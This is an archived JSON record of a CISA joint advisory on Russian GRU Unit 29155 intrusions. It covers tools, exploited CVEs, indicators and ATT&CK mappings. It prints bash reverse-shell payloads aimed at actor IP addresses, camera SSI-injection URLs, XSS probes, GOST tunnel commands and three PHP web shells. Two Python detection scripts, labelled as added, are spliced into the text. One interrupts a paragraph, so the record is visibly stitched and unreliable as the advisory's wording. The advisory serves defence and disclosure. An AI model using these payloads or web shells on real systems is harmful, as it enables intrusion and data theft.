{
	"id": "ed6d184f-5304-4010-91fb-80c70c238351",
	"created_at": "2026-04-06T00:07:39.207655Z",
	"updated_at": "2026-04-10T13:11:54.388907Z",
	"deleted_at": null,
	"sha1_hash": "09390340ca758f19c77c734684bb4670b3a5c0ae",
	"title": "Russian Military Cyber Actors Target US and Global Critical Infrastructure | CISA",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 427329,
	"plain_text": "Russian Military Cyber Actors Target US and Global Critical\r\nInfrastructure | CISA\r\nPublished: 2024-09-05 · Archived: 2026-04-05 18:19:43 UTC\r\nSummary\r\nThe Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and National Security\r\nAgency (NSA) assess that cyber actors affiliated with the Russian General Staff Main Intelligence Directorate (GRU) 161st\r\nSpecialist Training Center (Unit 29155) are responsible for computer network operations against global targets for the\r\npurposes of espionage, sabotage, and reputational harm since at least 2020. GRU Unit 29155 cyber actors began deploying\r\nthe destructive WhisperGate malware against multiple Ukrainian victim organizations as early as January 13, 2022. These\r\ncyber actors are separate from other known and more established GRU-affiliated cyber groups, such as Unit 26165 and Unit\r\n74455.\r\nTo mitigate this malicious cyber activity, organizations should take the following actions today:\r\nPrioritize routine system updates and remediate known exploited vulnerabilities.\r\nSegment networks to prevent the spread of malicious activity.\r\nEnable phishing-resistant multifactor authentication (MFA) for all externally facing account services, especially for\r\nwebmail, virtual private networks (VPNs), and accounts that access critical systems.\r\nThis Cybersecurity Advisory provides tactics, techniques, and procedures (TTPs) associated with Unit 29155 cyber actors—\r\nboth during and succeeding their deployment of WhisperGate against Ukraine—as well as further analysis (see Appendix\r\nA) of the WhisperGate malware initially published in the joint advisory, Destructive Malware Targeting Organizations in\r\nUkraine, published February 26, 2022.\r\nFBI, CISA, NSA and the following partners are releasing this joint advisory as a collective assessment of Unit 29155 cyber\r\noperations since 2020:\r\nU.S. Department of the Treasury\r\nU.S. 
Department of State (Rewards for Justice)\r\nU.S. Cyber Command Cyber National Mission Force (CNMF)\r\nNetherlands Defence Intelligence and Security Service (MIVD)\r\nCzech Military Intelligence (VZ)\r\nCzech Republic Security Information Service (BIS)\r\nGerman Federal Office for the Protection of the Constitution (BfV)\r\nEstonian Internal Security Service (KAPO)\r\nLatvian State Security Service (VDD)\r\nSecurity Service of Ukraine (SBU)\r\nComputer Emergency Response Team of Ukraine (CERT-UA)\r\nCanadian Security Intelligence Service (CSIS)\r\nCommunications Security Establishment Canada (CSE)\r\nAustralian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC)\r\nUnited Kingdom National Cyber Security Centre (NCSC-UK)\r\nFor additional information on Russian state-sponsored malicious cyber activity and related indictments, see the recent U.S. Department of Justice (DOJ) press releases for June 26, 2024, and September 5, 2024, FBI’s Cyber Crime webpage, and CISA’s Russia Cyber Threat Overview and Advisories webpage.\r\nTechnical Details\r\nNote: This advisory uses the MITRE ATT\u0026CK® Matrix for Enterprise framework, version 15. See the MITRE ATT\u0026CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT\u0026CK tactics and techniques.\r\nGRU Unit 29155: Cyber Component\r\nFBI, NSA, and CISA assess Unit 29155 is responsible for attempted coups, sabotage and influence operations, and assassination attempts throughout Europe. Unit 29155 has expanded its tradecraft to include offensive cyber operations since at least 2020. 
Unit 29155 cyber actors’ objectives appear to include the collection of information for espionage purposes,\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa24-249a\r\nPage 1 of 20\n\nreputational harm caused by the theft and leakage of sensitive information, and systematic sabotage caused by the\r\ndestruction of data [T1485 ].\r\nFBI assesses the Unit 29155 cyber actors to be junior active-duty GRU officers under the direction of experienced Unit\r\n29155 leadership. These individuals appear to be gaining cyber experience and enhancing their technical skills through\r\nconducting cyber operations and intrusions. Additionally, FBI assesses Unit 29155 cyber actors rely on non-GRU actors,\r\nincluding known cyber-criminals and enablers to conduct their operations.\r\nCybersecurity Industry Tracking\r\nThe cybersecurity industry provides overlapping cyber threat intelligence, IOCs, and mitigation recommendations related to\r\nUnit 29155 cyber actors. While not all encompassing, the following are the most notable threat group names related under\r\nMITRE ATT\u0026CK G1003  and commonly used within the cybersecurity community.\r\nCadet Blizzard (formerly known as DEV-0586 by Microsoft)[1 ],[2 ]\r\nEmber Bear (also known as Bleeding Bear by CrowdStrike)[3 ]\r\nFrozenvista\r\nUNC2589[4 ]\r\nUAC-0056[5 ]\r\nNote: Cybersecurity companies have different methods of tracking and attributing cyber actors, and this may not be a 1:1\r\ncorrelation to the U.S. Government’s understanding for all activity related to these groupings.\r\nVictimization\r\nIn addition to WhisperGate and other incidents against Ukraine, Unit 29155 cyber actors have conducted computer network\r\noperations against numerous members of the North Atlantic Treaty Organization (NATO) in Europe and North America, as\r\nwell as countries in Europe, Latin America, and Central Asia. 
The activity includes cyber campaigns such as website\r\ndefacements, infrastructure scanning, data exfiltration, and data leak operations. These actors sell or publicly release\r\nexfiltrated victim data obtained from their compromises. Since early 2022, the primary focus of the cyber actors appears to\r\nbe targeting and disrupting efforts to provide aid to Ukraine.\r\nTo date, the FBI has observed more than 14,000 instances of domain scanning across at least 26 NATO members and several\r\nadditional European Union (EU) countries. Unit 29155 cyber actors have defaced victim websites and used public website\r\ndomains to post exfiltrated victim information.\r\nWhether through offensive operations or scanning activity, Unit 29155 cyber actors are known to target critical\r\ninfrastructure and key resource sectors, including the government services, financial services, transportation systems,\r\nenergy, and healthcare sectors of NATO members, the EU, Central American, and Asian countries.\r\nTTP Overview\r\nReconnaissance\r\nUnit 29155 cyber actors have been observed targeting IP ranges [T1595.001 ] used within multiple government and\r\ncritical infrastructure organizations. The following are publicly available tools these cyber actors have used for scanning\r\n[T1595 ] and vulnerability exploit efforts. Unit 29155 cyber actors were not observed using these tools outside of their\r\nintended purpose. 
Note: Use of these tools should not be attributed as malicious without analytical evidence to support threat actor use and/or control.\r\nAcunetix: Unit 29155 cyber actors leveraged both Acunetix and Nmap to identify open ports, services, and vulnerabilities for networks [T1595.002].[6]\r\nAmass: Unit 29155 cyber actors leveraged both Amass and VirusTotal to obtain subdomains for target websites [T1590.002].[7]\r\nDroopescan[8]\r\nJoomScan[9]\r\nMASSCAN: Unit 29155 cyber actors used MASSCAN and Nmap to discover other machines once inside victim networks.[10]\r\nNetcat[11]\r\nNmap: Once Unit 29155 cyber actors gained access to victim internal networks, they further used Nmap (via the Nmap Scripting Engine [NSE]) to write custom scripts for discovering and scanning other machines [T1046].\r\nShodan: Unit 29155 cyber actors used Shodan to identify hosts with a specific set of vulnerabilities or device types [T1596.005].[12]\r\nVirusTotal[13]\r\nWPScan\r\nAdditionally, Unit 29155 cyber actors have used infrastructure configured with OpenVPN [T1572] over port 1194, in some instances to perform Active Directory (AD) enumeration. Adminer, in combination with Impacket and ldapdomaindump, was used for gathering information on AD. Once active devices are found, Unit 29155 cyber actors look for vulnerabilities to exploit. 
For example, the Acunetix vulnerability scanning tool has been used for gathering\r\ninformation on potential vulnerabilities such as blind cross-site scripting, as shown in the following commands:\r\nGET /index.php?log=to@example.com\u003e%0d%0abcc:009247.3183-377.3183.1bf6c.19446.2@bxss.me\r\n\"GET /CMS/files/log.htm HTTP/1.1\" * * \"(nslookup hitccruvbrumn76c1b.bxss.me||perl -e\r\n\\\"gethostbyname('hitccruvbrumn76c1b.bxss.me')\\\")\"\r\nAs the cyber actors perform reconnaissance on victim networks and discover vulnerabilities within victim web servers or\r\nmachines, they obtain CVE exploit scripts from GitHub repositories and use them against victim infrastructure [T1588.005\r\n]. Unit 29155 cyber actors have been observed obtaining the respective exploit scripts for, but not exploiting, the\r\nfollowing CVEs:\r\nCVE-2020-1472 (Microsoft: Windows Server)\r\nCVE-2021-26084 (Atlassian Confluence Server and Data Center)\r\nCVE-2021-3156 (Red Hat: Privilege Escalation via Command Line Argument Parsing)\r\nCVE-2021-4034 (Red Hat: Polkit Privilege Escalation)\r\nCVE-2022-27666 (Red Hat: Heap Buffer Overflow Flaw)\r\nAnalysis concluded Unit 29155 cyber actors have exploited the following CVEs for initial access [T1190 ], as detailed\r\nthroughout this advisory:\r\nCVE-2021-33044 (Dahua Security)\r\nCVE-2021-33045 (Dahua Security)\r\nCVE-2022-26134 (Atlassian Confluence Server and Data Center)\r\nCVE-2022-26138 (Atlassian Confluence Server and Data Center)\r\nCVE-2022-3236 (Sophos: Firewall)\r\nResource Development\r\nRather than build custom solutions, Unit 29155 cyber actors use common red teaming techniques and publicly available\r\ntools to conduct cyber operations. 
As a result, many TTPs overlap with those of other cyber actors, which can lead to\r\nmisattribution.\r\nUnit 29155 actors and their cyber-criminal affiliates commonly maintain accounts on dark web forums; this has provided the\r\nopportunity to obtain various hacker tools such as malware and malware loaders [T1588.001 ] like Raspberry Robin and\r\nSaintBot. While Unit 29155 cyber actors are best known for their use of WhisperGate malware against Ukraine, the use of\r\nWhisperGate is not unique to the group. Technical analysis can be found in Appendix A: WhisperGate Malware Analysis.\r\nInitial Access\r\nUnit 29155 cyber actors are known to use VPNs to anonymize their operational activity. These cyber actors commonly\r\nattempt to exploit weaknesses in internet-facing systems, like the CVEs listed above, to initially access networks. In one\r\ninstance, Unit 29155 cyber actors exploited CVE-2021-33044 and CVE-2021-33045 on Dahua IP cameras to bypass identity\r\nauthentication.\r\nLateral Movement\r\nUnit 29155 cyber actors have used Shodan to scan for Internet of Things (IoT) devices, using exploitation scripts to\r\nauthenticate to IP cameras with default usernames and passwords [T1078.001 ], and exfiltrating images [T1125 ] (JPG\r\nfiles). 
Attempts are then made to perform remote command execution via web to vulnerable IP cameras; if successful, cyber actors would dump configuration settings and credentials in plaintext (as shown in Table 1 below) [T1552.001].\r\nAppendix B: Indicators of Compromise lists threat actor IP addresses associated with the activity detailed in this section.\r\nNote: These events are independent and not correlated as a single timeline of compromise.\r\nTable 1: IP camera exploitation observations\r\nEvent | Victim Observation\r\nWeb requests observed from victim infrastructure | These requests are likely intended to dump configuration settings and credentials [T1003]:\r\nhxxp://\u003cIP\u003e:\u003cport\u003e/PictureCatch.cgi?username=\u003cNAME\u003e\u0026password=%3becho%20%22%3c%21--%23include%20file=%22SYS_CFG%22--%3e%22%3etmp/Login.htm%3b\u0026data_type=1\u0026attachment=1\u0026channel=1\u0026secret=1\u0026key=PWNED\r\nhxxp://\u003cIP\u003e:\u003cport\u003e/ssi.cgi/tmp/Login.htm\r\nPOST requests sent to victims with payloads [T1071.001] |\r\n\"txtUser=lol\u0026txtPassword=2\u0026btConnect=Piesl%C4%93gtiesbtConnect=Piesl%C4%93gties\u0026chRemember=on\u0026txtPassword=g00dPa%24%24wi%20%3E%26%20%2Fdev%2Ftcp%2F179.43.175.38%2F6870%200%3E%261%22))%7d\"\r\n\"txtUser=lol\u0026txtPassword=2\u0026btConnect=Piesl%C4%93gtiesbtConnect=Piesl%C4%93gties\u0026chRemember=on\u0026txtPassword=g00dPa%24%24wi%20%3E%26%20%2Fdev%2Ftcp%2F81.17.24.130%2F6870%200%3E%261%22))%7d\"\r\nURL-encoded values from txtUser for both commands, decoded to embedded bash commands |\r\n${@print(system(\"bash -i \u003e\u0026 /dev/tcp/179.43.175.38/6870 0\u003e\u00261\"))}\r\n${@print(system(\"bash -i \u003e\u0026 /dev/tcp/81.17.24.130/6870 0\u003e\u00261\"))}\r\nIn addition, incident analysis identified the general observations listed below on victim infrastructure. 
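The Acunetix blind-XSS probes quoted in the Reconnaissance section and the camera requests and encoded login payloads in Table 1 share one property: the hostile content is only visible after percent-decoding, sometimes twice. The following Python is an added example, not code from the advisory, that decodes captured requests, flags those patterns, and pulls the reverse-shell callback address out of the PHP-template payload so it can be blocked. The sample requests are constructed to mirror the advisory's quotations; the placement of the nslookup/gethostbyname probe in the User-Agent field, the /login path, the benign Joomla request and the indicator names are assumptions made for the example.

```python
import re
from urllib.parse import unquote, unquote_plus

# Constructed sample captures (target, User-Agent, body). They mirror the request
# shapes quoted in this advisory but are not victim traffic. Assumptions: the
# command-injection probe of request 1 sits in the User-Agent field, request 4's
# body is the fully encoded form of the decoded payload the advisory shows.
SAMPLE_REQUESTS = [
    {"method": "GET", "user_agent": "Mozilla/5.0", "body": "",
     "target": "/index.php?log=to@example.com>%0d%0abcc:009247.3183-377.3183.1bf6c.19446.2@bxss.me"},
    {"method": "GET", "target": "/CMS/files/log.htm", "body": "",
     "user_agent": "(nslookup hitccruvbrumn76c1b.bxss.me||perl -e \"gethostbyname('hitccruvbrumn76c1b.bxss.me')\")"},
    {"method": "GET", "user_agent": "Mozilla/5.0", "body": "",
     "target": "/PictureCatch.cgi?username=admin&password=%3becho%20%22%3c%21--%23include%20file=%22SYS_CFG%22--%3e%22%3etmp/Login.htm%3b&data_type=1&attachment=1&channel=1&secret=1&key=PWNED"},
    {"method": "GET", "target": "/ssi.cgi/tmp/Login.htm", "user_agent": "Mozilla/5.0", "body": ""},
    {"method": "POST", "target": "/login", "user_agent": "Mozilla/5.0",
     "body": "txtUser=lol&txtPassword=%24%7B%40print%28system%28%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F179.43.175.38%2F6870%200%3E%261%22%29%29%7D&btConnect=Piesl%C4%93gties&chRemember=on"},
    {"method": "GET", "target": "/index.php?option=com_content&view=article&id=42", "user_agent": "Mozilla/5.0", "body": ""},
]

# (indicator name, pattern applied to the decoded text). The reverse-shell pattern
# captures the callback address so the C2 endpoint can be extracted for blocking.
INDICATORS = [
    ("oast_callback", re.compile(r"(?:[\w-]+\.)*bxss\.me\b", re.I)),
    ("crlf_header_injection", re.compile(r"\r\n\s*(?:bcc|cc|to|from):", re.I)),
    ("command_injection_probe", re.compile(r"\b(?:nslookup\s+\S+|gethostbyname\s*\()", re.I)),
    ("ssi_include_injection", re.compile(r"<!--\s*#include\b", re.I)),
    ("dahua_camera_cgi", re.compile(r"/(?:PictureCatch|ssi)\.cgi\b", re.I)),
    ("reverse_shell", re.compile(r"/dev/tcp/(\d{1,3}(?:\.\d{1,3}){3})/(\d{1,5})")),
    ("php_code_injection", re.compile(r"\$\{@?(?:print|system|eval|exec)\b|\bsystem\s*\(")),
]


def deep_decode(value, form=False, rounds=3):
    """Percent-decode repeatedly (probes are often double-encoded) until stable.
    Form bodies treat '+' as a space; URL targets and headers do not."""
    decode = unquote_plus if form else unquote
    for _ in range(rounds):
        decoded = decode(value)
        if decoded == value:
            break
        value = decoded
    return value


def triage(requests):
    """Return one finding per (request, indicator) with the decoded evidence."""
    findings = []
    for idx, req in enumerate(requests):
        fields = {
            "target": deep_decode(req.get("target", "")),
            "user_agent": deep_decode(req.get("user_agent", "")),
            "body": deep_decode(req.get("body", ""), form=True),
        }
        for name, pattern in INDICATORS:
            for field, text in fields.items():
                match = pattern.search(text)
                if match:
                    evidence = match.group(0)
                    if name == "reverse_shell":
                        evidence = f"{match.group(1)}:{match.group(2)}"
                    findings.append({"request": idx, "indicator": name,
                                     "field": field, "evidence": evidence})
                    break  # one finding per indicator per request
    return findings


def indicators_for(findings, idx):
    """Sorted indicator names raised for request number idx."""
    return sorted(f["indicator"] for f in findings if f["request"] == idx)


def reverse_shell_endpoints(findings):
    """Distinct ip:port callback targets seen in reverse-shell payloads."""
    return sorted({f["evidence"] for f in findings if f["indicator"] == "reverse_shell"})


if __name__ == "__main__":
    results = triage(SAMPLE_REQUESTS)
    for f in results:
        print(f"request {f['request']}: {f['indicator']} in {f['field']}: {f['evidence']!r}")
    print("reverse-shell endpoints:", reverse_shell_endpoints(results))
```

Replace SAMPLE_REQUESTS with proxy or WAF captures to run this against real traffic. The OAST pattern is deliberately narrow (the bxss.me domain the advisory shows) and should be widened to the out-of-band services your own scanners use, and the camera CGI path match is only meaningful on hosts that have no business serving those endpoints.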
Each event should be considered independent and may have been used by Unit 29155 cyber actors against multiple victims at different dates and timeframes. Appendix B: Indicators of Compromise lists IOCs associated with the observations in Table 1 and below.\r\nIn one instance shortly following a deployment of WhisperGate malware, Unit 29155 cyber actors exfiltrated data to mega[.]nz using Rclone [T1567.002].\r\nUnit 29155 cyber actors used Pass-the-Hash [T1550.002] via ProxyChains.\r\nCyber actors performed SSH and SSHPass executions.\r\nCyber actors initiated a web request and executed commands via ProxyChains. This included obtaining NT hashes via Server Message Block (SMB) using smbclient, executing Windows Management Instrumentation (WMI) with hashes, and making web requests with resources i.php and tunnel.jsp. In one instance, cyber actors used smbclient via ProxyChains to access internal network shares, and subsequently PSQL and MySQL clients to access internal databases.\r\nCyber actors used Impacket for post-exploitation and lateral movement. The script secretsdump.py was used from the Impacket framework to obtain domain credentials, while psexec.py was subsequently used to move laterally within a victim network.\r\nCyber actors used ntlmrelayx.py via Impacket and krbrelayx.py, which requires Impacket to function.\r\nCyber actors used Responder.py.\r\nCyber actors used su-bruteforce to brute force a selected user using the su command.\r\nCyber actors used BloodHound, an open source AD reconnaissance tool that can reveal hidden relationships and identify attack paths within an AD environment.\r\nCyber actors used CrackMapExec via ProxyChains with SMB protocol targeting internal victim IP addresses. 
This\r\nopen source post-exploitation tool automates assessing the security of large AD networks.\r\nCyber actors used LinPEAS , an open source script designed to automate the process of searching for potential\r\nprivilege escalation vulnerabilities on a Linux victim.\r\nCyber actors used GO Simple Tunnel (GOST) (MD5: 896e0f54fc67d72d94b40d7885f10c51 ) for 30 days within one\r\nincident and against additional victims on various occasions. GOST is a tunneling tool designed to establish secure\r\nconnections between clients and servers, allowing for secure data transmission over untrusted networks.\r\nCyber actors used Through the Wire against a victim’s internet-facing Confluence server. Through the Wire is a proof\r\nof concept[14 ] exploit for CVE-2022-26134, an OGNL injection vulnerability allowing an unauthenticated user to\r\nexecute arbitrary code on a Confluence Server or Data Center instance. All versions of Confluence Server and Data\r\nCenter prior to the fixed versions listed by Atlassian are affected by this vulnerability.[15 ] A reverse shell over\r\nHTTPS was used to communicate over listening host on port 8081 .\r\nCyber actors initiated Nmap scans on localized web servers.\r\nCyber actors performed lateral movement from compromised web servers to exploit a corporate Microsoft Windows\r\nnetwork, commonly using psexec.py from the Impacket framework. 
The script secretsdump.py from the Impacket framework was used to obtain domain credentials.\r\nCyber actors may have used Raspberry Robin malware in the role of an access broker [T1588.001].\r\nCyber actors targeted victims’ Microsoft Outlook Web Access (OWA) infrastructure with password spraying to obtain valid usernames and passwords [T1110.003].\r\nCommand and Control\r\nInfrastructure\r\nSince at least 2020, Unit 29155 cyber actors have used virtual private servers (VPSs) [T1583.003] to host their operational tools, perform reconnaissance, exploit victim infrastructure, and exfiltrate victim data. Use of VPSs is common because the associated IP addresses do not reveal the actors’ true country of origin.\r\nPost-Exploitation\r\nWhen an exploit is successfully executed on a victim system, the actors can then launch a Meterpreter payload [T1105], which commonly uses a reverse Transmission Control Protocol (TCP) connection to initiate communication with the threat actors’ infrastructure [T1095]. In one instance, an established reverse TCP session was observed from victim to actor infrastructure via the following ports: 1234, 1851, 43221, 443, 4444, 4688, 5432, 8080, 8081, 8082, 8084, 8085, 8088, 8089, 8090, 8443, 8487, and 8888.\r\nAdditional observations were collected from victim engagement and analysis, including:\r\nUse of the Metasploit Framework to search for and/or access modules such as mysql, postgres, and ssh software and features.\r\nUse of Meterpreter and Netcat to execute reverse shells over ports such as 8081.\r\nUse of Impacket.\r\nUse of PHP (exp_door v1.0.2, b374k, WSO 4.0.5) and the P.A.S. 
web shells [T1505.003], likely for initial access.\r\nUse of EternalBlue.[16],[17]\r\nUse of reGeorg or Neo-reGeorg to set up a proxy to tunnel network traffic following compromise of a victim website, as well as use of ProxyChains to run Nmap within the network.\r\nEncrypted Communication\r\nOnce Unit 29155 cyber actors gain access to the victims’ internal network, the following has been observed:\r\n1. Using Domain Name System (DNS) tunneling tools, such as dnscat/2 and Iodine, to tunnel IPv4 network traffic [T1071.004]. For example, Iodine was used to tunnel data via dns.test658324901domain.me.\r\n2. Configuring a proxy within the victim infrastructure and executing commands within the network via ProxyChains. ProxyChains, a tool used to route internal traffic through a series of proxies [T1090.003], has been used to provide further anonymity and to modify system configuration to force network traffic through chains of SOCKS5 proxies and respective ports. Ports used by actor infrastructure include: 1080, 1333, 13381, 13391, 13666, 13871, 1448, 1888, 3130, 3140, 4337, 50001, and 8079.\r\n3. Using the GOST open source tunneling tool (via SOCKS5 proxy) under the name java, as shown in the following running processes from victim incident response results. The binary is started from /tmp/.ICE-unix with shell history disabled (HISTFILE=/dev/null):\r\n8212 - SJ 0:02.54 HISTFILE=/dev/null PATH=/sbin:/bin:/usr/sbin:/usr/bin LD_LIBRARY_PATH=/usr/local/lib:/usr/local/lib OLDPWD=/tmp PWD=/tmp/.ICE-unix HOME=/ RC_PID=33980 ./java -L socks5://127.0.0.1:13338\r\n8282 - IJ 0:03.98 HISTFILE=/dev/null PATH=/sbin:/bin:/usr/sbin:/usr/bin LD_LIBRARY_PATH=/usr/local/lib:/usr/local/lib OLDPWD=/tmp PWD=/tmp/.ICE-unix HOME=/ RC_PID=33980 ./java -L rtcp://0.0.0.0:13381/127.0.0.1:13338 -F socks5://{IP Address}:7896\r\nThe first process opens a local SOCKS5 listener on 127.0.0.1:13338. The second registers a reverse TCP forward (rtcp) through the actor’s SOCKS5 server on port 7896, so that the local listener becomes reachable from actor infrastructure on port 13381, one of the ProxyChains ports listed above.\r\n4. 
Modifying .php scripts to manipulate server-side operations, such as the observations listed in Table 2 below.\r\nTable 2: Modified PHP scripts (commands shown base64-decoded)\r\nScript: /usr/local/www/apache24/data/-redacted-/plugins/extension/joomla/joomla.php\r\nCommand:\r\nif (isset($_POST[\"sessionsid_wp\"]))\r\n{\r\n    $poll_id = $_POST[\"sessionsid_wp\"];\r\n    $sessii = explode(\":\", base64_decode($poll_id));\r\n    $sock = fsockopen($sessii[0], $sessii[1]);\r\n    $proc = proc_open(\"/bin/sh -i\", array(0 =\u003e $sock, 1 =\u003e $sock, 2 =\u003e $sock), $pipes);\r\n}\r\nPurpose: Creates a session. The script connects back to the host:port supplied (base64-encoded) in the sessionsid_wp POST parameter and attaches an interactive /bin/sh to the socket, i.e., a reverse shell.\r\nScript: /usr/local/www/apache24/data/-redacted-/plugins/authentication/joomla/joomla.php\r\nCommand:\r\nfunction nb_res($a)\r\n{\r\n    eval(system(base64_decode($a)));\r\n}\r\nPurpose: Allows a program to run. The function executes a base64-encoded command supplied by the caller.\r\nScript: /usr/local/www/apache24/data/-redacted-/plugins/privacy/contact/contact.php\r\nCommand:\r\nif (isset($_POST['f1']))\r\n{\r\n    $f1 = $_POST['f1'];\r\n    $f2 = $_POST['f2'];\r\n    $content = base64_decode($f1);\r\n    $h = fopen($f2, \"w\");\r\n    $text = \"$content\";\r\n    fwrite($h, $text);\r\n    fclose($h);\r\n}\r\nPurpose: Allows writing to files. The script writes the base64-decoded content of POST parameter f1 to the path given in f2, an arbitrary file write.\r\nExfiltration\r\nIn several instances, analysis identified Unit 29155 cyber actors compressing victim data [T1560] (e.g., the entire filesystem, select file system artifacts or user data, and/or database dumps) to send back to their infrastructure. These cyber actors commonly use the command-line program Rclone to exfiltrate data to a remote location from victim infrastructure.\r\nUnit 29155 cyber actors have exfiltrated Windows processes and artifacts, such as Local Security Authority Subsystem Service (LSASS) memory dumps [T1003.001], Security Accounts Manager (SAM) files [T1003.002], and SECURITY and SYSTEM event log files [T1654]. 
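The renamed GOST processes in item 3 above and the modified Joomla plugin files in Table 2 are two findings an incident responder pulls from the same compromised web server. The following Python is an added example, not code from the advisory, that turns those observations into checks: it parses ps-style lines for a tunnel binary started with HISTFILE=/dev/null from a temp directory using GOST's -L/-F endpoint syntax, and scans PHP sources for the three web-shell traits shown in Table 2. The process lines and plugin sources are constructed to mirror the advisory; the 203.0.113.10 address, the benign cache.php plugin and the reason names are assumptions for the example.

```python
import re

# Constructed 'ps -eww'-style lines (pid, stat, cpu time, environment, command),
# modelled on the advisory's listing; the actor address is replaced by a
# documentation-range address. Not output from a real host.
PS_LINES = [
    "8212 - SJ 0:02.54 HISTFILE=/dev/null PATH=/sbin:/bin:/usr/sbin:/usr/bin OLDPWD=/tmp "
    "PWD=/tmp/.ICE-unix HOME=/ RC_PID=33980 ./java -L socks5://127.0.0.1:13338",
    "8282 - IJ 0:03.98 HISTFILE=/dev/null PATH=/sbin:/bin:/usr/sbin:/usr/bin OLDPWD=/tmp "
    "PWD=/tmp/.ICE-unix HOME=/ RC_PID=33980 ./java -L rtcp://0.0.0.0:13381/127.0.0.1:13338 "
    "-F socks5://203.0.113.10:7896",
    "1337 - S 1:12.00 PATH=/usr/local/bin:/usr/bin HOME=/usr/local/tomcat "
    "/usr/local/openjdk11/bin/java -Xmx2g -jar /opt/app/app.jar",
]

# Constructed Joomla plugin sources: three condense the shells in Table 2, one is benign.
SAMPLE_PHP = {
    "plugins/extension/joomla/joomla.php": (
        '<?php if (isset($_POST["sessionsid_wp"])) { $s = explode(":", base64_decode($_POST["sessionsid_wp"]));'
        ' $sock = fsockopen($s[0], $s[1]); $p = proc_open("/bin/sh -i", array(0=>$sock,1=>$sock,2=>$sock), $pipes); }'),
    "plugins/authentication/joomla/joomla.php": (
        '<?php function nb_res($a) { eval(system(base64_decode($a))); }'),
    "plugins/privacy/contact/contact.php": (
        '<?php if (isset($_POST["f1"])) { $h = fopen($_POST["f2"], "w");'
        ' fwrite($h, base64_decode($_POST["f1"])); fclose($h); }'),
    "plugins/system/cache/cache.php": (
        '<?php defined("_JEXEC") or die; class PlgSystemCache { function onAfterRender() { return true; } }'),
}

ENV_TOKEN = re.compile(r"^[A-Z_][A-Z0-9_]*=")  # uppercase NAME=value: environment, not -Dprop=value
GOST_ENDPOINT = re.compile(r"^(?:socks[45]|ss|http|https|tls|ws|wss|rtcp|rudp|relay)://")
TEMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")


def parse_ps_line(line):
    """Split a ps line into pid, state, env dict and argv; env tokens precede the command."""
    pid, _, stat, _, *rest = line.split()
    env, i = {}, 0
    while i < len(rest) and ENV_TOKEN.match(rest[i]):
        key, value = rest[i].split("=", 1)
        env[key] = value
        i += 1
    return {"pid": pid, "stat": stat, "env": env, "argv": rest[i:]}


def process_reasons(proc):
    """Heuristics for a tunnel binary hidden under a benign-looking name."""
    env, argv = proc["env"], proc["argv"]
    reasons = []
    if env.get("HISTFILE") == "/dev/null":
        reasons.append("history_disabled")
    if env.get("PWD", "").startswith(TEMP_DIRS):
        reasons.append("runs_from_temp_dir")
    has_flag = any(arg in ("-L", "-F") for arg in argv[1:])
    has_endpoint = any(GOST_ENDPOINT.match(arg) for arg in argv[1:])
    if has_flag and has_endpoint:  # gost -L <listen> [-F <forward chain>]
        reasons.append("gost_tunnel_syntax")
    if argv and argv[0].startswith("./"):
        reasons.append("relative_binary_path")
    return reasons


def suspicious_processes(lines):
    """Processes with at least one reason, keeping argv for the analyst."""
    flagged = []
    for proc in map(parse_ps_line, lines):
        reasons = process_reasons(proc)
        if reasons:
            flagged.append({"pid": proc["pid"], "argv": proc["argv"], "reasons": reasons})
    return flagged


# Order matters in these patterns: the dangerous call must consume attacker-supplied data.
PHP_CHECKS = [
    ("reverse_shell_socket", re.compile(r"fsockopen\s*\(.*proc_open\s*\(", re.S)),
    ("encoded_eval", re.compile(r"\b(?:eval|system|passthru|shell_exec|assert)\s*\(.*base64_decode", re.S)),
    ("request_to_file_write", re.compile(r"\$_(?:POST|GET|REQUEST)\b.*fopen\s*\(.*fwrite\s*\(", re.S)),
]


def scan_php(files):
    """Map each flagged path to the web-shell traits found in its source."""
    hits = {}
    for path, source in files.items():
        reasons = [name for name, pattern in PHP_CHECKS if pattern.search(source)]
        if reasons:
            hits[path] = reasons
    return hits


if __name__ == "__main__":
    for proc in suspicious_processes(PS_LINES):
        print(proc["pid"], " ".join(proc["argv"]), "->", ", ".join(proc["reasons"]))
    for path, reasons in scan_php(SAMPLE_PHP).items():
        print(path, "->", ", ".join(reasons))
```

On a live host, feed `ps -axwwe` output (the `e` flag includes the environment, which is what exposes HISTFILE and PWD) and walk the web root for .php files; on a Joomla install, the flagged plugin files should then be diffed against the same files from a clean package of the installed version before anything is deleted.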
As seen in victim incident response results, actor infrastructure has also been used to compromise multiple mail servers [T1114] and exfiltrate mail artifacts, such as email messages, using PowerShell [T1059.001] via the following command, which exports a mailbox to a .pst file on an SMB share addressed by IP:\r\npowershell New-MailboxExportRequest -Mailbox \u003cresource\u003e -FilePath \\\\{IP Address}\\sharefolder\\1.pst\r\nMITRE ATT\u0026CK Tactics and Techniques\r\nSee Table 3 to Table 14 for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT\u0026CK framework, see CISA and MITRE ATT\u0026CK’s Best Practices for MITRE ATT\u0026CK Mapping and CISA’s Decider Tool.\r\nTable 3: Reconnaissance\r\nTechnique Title | ID | Use\r\nGather Victim Network Information: DNS | T1590.002 | Unit 29155 cyber actors have used Amass and VirusTotal to obtain information about victims’ DNS for possible use during targeting, such as subdomains for target websites.\r\nActive Scanning | T1595 | Unit 29155 cyber actors use publicly available tools to gather information for possible use during targeting.\r\nActive Scanning: Scanning IP Blocks | T1595.001 | Unit 29155 cyber actors use various open source scanning tools to scan for victim IP ranges.\r\nActive Scanning: Vulnerability Scanning | T1595.002 | Unit 29155 cyber actors use publicly available scanning tools to enable their discovery of IoT devices and exploitable vulnerabilities. Tools leveraged for scanning include Acunetix, Amass, Droopescan, eScan, and JoomScan.\r\nSearch Open Technical Databases: Scan Databases | T1596.005 | Unit 29155 cyber actors use publicly available platforms like Shodan to identify internet connected hosts.\r\nTable 4: Resource Development\r\nTechnique Title | ID | Use\r\nAcquire Infrastructure: Virtual Private Server | T1583.003 | Unit 29155 cyber actors have used VPSs to host their operational tools, perform reconnaissance, exploit victim infrastructure, and exfiltrate victim 